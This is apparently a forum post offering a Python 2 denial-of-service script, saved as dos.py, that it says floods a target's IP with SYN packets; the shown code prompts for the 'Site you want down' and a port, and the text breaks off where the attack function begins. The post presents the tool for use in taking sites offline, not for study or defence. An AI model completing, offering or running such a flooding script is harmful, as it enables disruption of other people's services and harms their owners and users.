This program floods the target's IP address with SYN packets... Save it as dos.py and then execute it.

[hide=15][code]
from os import *
from socket import *
from string import *
from random import *
from time import *
from thread import *

host = raw_input("Site you want down: ")
port = input("Port number: ")



def connect(i):